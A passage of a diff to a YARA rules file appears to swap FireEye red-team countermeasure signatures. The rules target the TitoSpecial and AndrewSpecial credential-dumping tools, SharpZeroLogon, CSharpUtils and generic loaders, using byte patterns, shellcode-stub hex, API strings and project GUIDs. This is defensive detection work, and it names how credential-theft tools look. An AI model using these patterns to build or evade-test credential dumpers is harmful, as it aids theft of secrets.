89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 44 24 30 04 00 08 00 44 89 74 24 28 4C 89 74 24 20 FF 15 0C 1D 01 00 85 C0 74 65 48 8B 4C 24 70 8B 5D 98 FF 15 1A 1D 01 00 48 8B 4D 88 FF 15 10 1D 01 00 48 8B 4D 90 FF 15 06 1D 01 00 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 4E 1D 01 00 48 8B D8 48 85 C0 74 2B 48 8B C8 E8 4E 06 00 00 48 85 C0 74 1E BA FF FF FF FF 48 8B C8 FF 15 3B 1D 01 00 48 8B CB FF 15 CA 1C 01 00 B8 01 00 00 00 EB 24 FF 15 DD 1C 01 00 8B D0 48 8D 0D 58 9E 01 00 E8 77 FC FF FF 48 85 FF 74 09 48 8B CF FF 15 A9 1C 01 00 33 C0 48 8B 9C 24 30 01 00 00 48 8B 4D 10 48 33 CC E8 03 07 00 00 4C 8D 9C 24 20 01 00 00 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 } + $bytes2 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 } + $bytes3 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 } + $bytes4 = { 48 89 74 24 ?? 48 89 7C 24 ?? 4C 89 74 24 ?? 55 48 8D 6C 24 ?? 48 81 EC 20 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 45 ?? 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 ?? 48 8D 0D ?? ?? ?? ?? 4C 89 74 24 ?? 0F 11 45 ?? 41 8B FE 4C 89 74 24 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 ?? 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 01 00 48 8D 05 ?? ?? ?? ?? B9 C8 05 00 00 90 F3 0F 6F 40 ?? 48 8D 40 ?? 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? F3 0F 6F 40 ?? 66 0F EF C2 F3 0F 7F 40 ?? 48 83 E9 01 75 ?? FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 45 ?? 41 B9 02 00 00 00 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 02 00 00 00 41 8D 51 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 48 8B C8 41 8D 50 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 8D 4C 24 ?? 4C 89 74 24 ?? 33 D2 41 B8 00 00 02 00 48 C7 44 24 ?? 08 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 45 ?? 48 89 7D ?? 48 89 44 24 ?? 45 33 C9 4C 89 74 24 ?? 33 D2 4C 89 74 24 ?? C7 44 24 ?? 04 00 08 00 44 89 74 24 ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 8B 5D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA FF FF FF FF 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 73 ?? 49 8B 7B ?? 4D 8B 73 ?? 49 8B E3 5D C3 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and any of them + uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and any of ($bytes*) } -rule FIREEYE_RT_Hacktool_MSIL_SHARPZEROLOGON_1 : FILE +rule FIREEYE_RT_Tool_MSIL_Csharputils_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'sharpzerologon' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CSharpUtils' project." author = "FireEye" - id = "51f22eee-fb96-55b0-8c02-1a0e9910a93e" + id = "a0e8c45a-759a-5611-aa2a-3113a75fb651" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPZEROLOGON/production/yara/HackTool_MSIL_SHARPZEROLOGON_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPUTILS/production/yara/Tool_MSIL_CSharpUtils_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "ed6a9bef5c6ee03aff969b8765b284ace517f2e6a1ef114acb04cf094c69cfa5" + logic_hash = "11dfd44fb4ee1e610c2e4a941b3a1e88eafc30a2a2237529150e73bceb2a1324" score = 75 - quality = 73 + quality = 65 tags = "FILE" - rev = 3 + rev = 1 strings: - $typelibguid0 = "15ce9a3c-4609-4184-87b2-e29fc5e2b770" ascii nocase wide + $typelibguid0 = "2130bcd9-7dd8-4565-8414-323ec533448d" ascii nocase wide + $typelibguid1 = "319228f0-2c55-4ce1-ae87-9e21d7db1e40" ascii nocase wide + $typelibguid2 = "4471fef9-84f5-4ddd-bc0c-31f2f3e0db9e" ascii nocase wide + $typelibguid3 = "5c3bf9db-1167-4ef7-b04c-1d90a094f5c3" ascii nocase wide + $typelibguid4 = "ea383a0f-81d5-4fa8-8c57-a950da17e031" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Loader_Win_Generic_17 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_TITOSPECIAL_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "4e5bf741-c1e3-54af-9580-02925ba6fc6a" + id = "b12490ba-41f6-5469-bcbb-0d2e0055c193" date = "2020-11-25" date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_17.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/APT_HackTool_MSIL_TITOSPECIAL_1.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "562ecbba043552d59a0f23f61cea0983" - logic_hash = "5c20472c3af0c5b8c825671b12763900d6a711695ed04661b33cbf442422348d" + hash = "4bf96a7040a683bd34c618431e571e26" + logic_hash = "6def0c667d38c1bad9233628e509bdcaed322e75be4ff3823b0f788c391e090c" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 5 strings: - $s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 } - $s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 } - $si1 = "fread" fullword - $si2 = "fwrite" fullword + $ind_dump = { 1F 10 16 28 [2] 00 0A 6F [2] 00 0A [50-200] 18 19 18 73 [2] 00 0A 13 [1-4] 06 07 11 ?? 6F [2] 00 0A 18 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 } + $ind_s1 = "NtReadVirtualMemory" fullword wide + $ind_s2 = "WriteProcessMemory" fullword + $shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 } + $shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of ($ind*) and any of ($shellcode*) } -rule FIREEYE_RT_Trojan_Win_Generic_101 : FILE +rule FIREEYE_RT_Hacktool_Win32_Andrewspecial_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "0290aaea-d65b-5883-97f9-549d107e3e1f" + id = "69e27e92-d68e-5543-bada-170e32733dbb" date = "2020-11-25" date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Win_Generic_101.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win32_AndrewSpecial_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "2e67c62bd0307c04af469ee8dcb220f2" - logic_hash = "e530183f3cab01560b1abc91e2111e5d9e5aadc1c8134027ac07d8917f9419a0" + hash = "e89efa88e3fda86be48c0cc8f2ef7230" + logic_hash = "529a49fb21250069111d03a174901dc2e1623ee2a1f446aae1bdb1579a227dd3" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 4 strings: - $s0 = { 2A [1-16] 17 [1-16] 02 04 00 00 [1-16] FF 15 } - $s1 = { 81 7? [1-3] 02 04 00 00 7? [1-3] 83 7? [1-3] 17 7? [1-3] 83 7? [1-3] 2A 7? } - $s2 = { FF 15 [4-16] FF D? [1-16] 3D [1-24] 89 [1-8] E8 [4-16] 89 [1-8] F3 A4 [1-24] E8 } - $si1 = "PeekMessageA" fullword - $si2 = "PostThreadMessageA" fullword + $dump = { 6A 00 68 FF FF 1F 00 FF 15 [4] 89 45 ?? 83 [2] 00 [1-50] 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 10 68 [4] FF 15 [4] 89 45 [10-70] 6A 00 6A 00 6A 00 6A 02 8B [2-4] 5? 8B [2-4] 5? 8B [2-4] 5? E8 [4-20] FF 15 } + $shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 } + $shellcode_x86_inline = { C6 45 ?? B8 C6 45 ?? 3C C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 33 C6 45 ?? C9 C6 45 ?? 8D C6 45 ?? 54 C6 45 ?? 24 C6 45 ?? 04 C6 45 ?? 64 C6 45 ?? FF C6 45 ?? 15 C6 45 ?? C0 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 83 C6 45 ?? C4 C6 45 ?? 04 C6 45 ?? C2 C6 45 ?? 14 C6 45 ?? 00 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and @s0[1]<@s1[1] and @s1[1]<@s2[1] and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and $dump and any of ($shellcode*) } -rule FIREEYE_RT_Trojan_Raw_Generic_4 : FILE +rule FIREEYE_RT_Credtheft_MSIL_Titospecial_2 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the TitoSpecial project. There are 2 GUIDs in this rule as the x86 and x64 versions of this tool use a different ProjectGuid." author = "FireEye" - id = "9092f9bb-cab6-55c0-9452-70a6407db93a" - date = "2020-12-02" - date = "2020-12-02" + id = "0262c720-e6b8-5bf2-a242-19a7f044973f" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Raw_Generic_4.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_2.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "f41074be5b423afb02a74bc74222e35d" - logic_hash = "8ffd23631c1a9d1abe6695858ec34d61261b3b3f097be94372f3f34e46e7211e" + hash = "4bf96a7040a683bd34c618431e571e26" + logic_hash = "2f621f8de2a4679e6cbce7f41859eaa3095ca54090c8bfccd3b767590ac91f2c" score = 75 - quality = 75 + quality = 71 tags = "FILE" - rev = 1 + rev = 4 strings: - $s0 = { 83 ?? 02 [1-16] 40 [1-16] F3 A4 [1-16] 40 [1-16] E8 [4-32] FF ( D? | 5? | 1? ) } - $s1 = { 0F B? [1-16] 4D 5A [1-32] 3C [16-64] 50 45 [8-32] C3 } + $typelibguid1 = "C6D94B4C-B063-4DEB-A83A-397BA08515D3" ascii nocase wide + $typelibguid2 = "3b5320cf-74c1-494e-b2c8-a94a24380e60" ascii nocase wide condition: - uint16(0)!=0x5A4D and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ($typelibguid1 or $typelibguid2) } -rule FIREEYE_RT_Loader_Win_Generic_18 : FILE +rule FIREEYE_RT_Hacktool_Win64_Andrewspecial_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "6f44bd64-29bd-50e2-8b61-7ba61bb1f688" + id = "20ce4902-4eb3-5ecf-aa8c-0515965dde57" date = "2020-11-25" date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_18.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win64_AndrewSpecial_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "c74ebb6c238bbfaefd5b32d2bf7c7fcc" - logic_hash = "28c9497f646fcf3daf7007d7afd37971dd85382062c064173f13049ad419fef1" + hash = "4456e52f6f8543c3ba76cb25ea3e9bd2" + logic_hash = "96f06c46dfec795fcfd08c188853d0a3f781003ae118833719a175eb59049c0d" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 5 strings: - $s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 } - $s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 } - $si1 = "fread" fullword - $si2 = "fwrite" fullword + $dump = { 33 D2 B9 FF FF 1F 00 FF 15 [10-90] 00 00 00 00 [2-6] 80 00 00 00 [2-6] 02 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4-120] 00 00 00 00 [2-6] 00 00 00 00 [2-6] 00 00 00 00 41 B9 02 00 00 00 [6-15] E8 [4-20] FF 15 } + $shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 } + $shellcode_x64_inline = { C6 44 24 ?? 4C C6 44 24 ?? 8B C6 44 24 ?? D1 C6 44 24 ?? B8 C6 44 24 ?? 3C C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 0F C6 44 24 ?? 05 C6 44 24 ?? C3 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and $dump and any of ($shellcode*) } -rule FIREEYE_RT_Builder_MSIL_Sharpgenerator_1 : FILE +rule FIREEYE_RT_Credtheft_MSIL_Titospecial_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGenerator' project." + description = "This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code." author = "FireEye" - id = "ab661cba-f695-59d2-9071-9b9a90233457" + id = "932bb013-03de-5cf7-89e9-b3232151d303" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPGENERATOR/production/yara/Builder_MSIL_SharpGenerator_1.yar#L4-L15" + source_url = 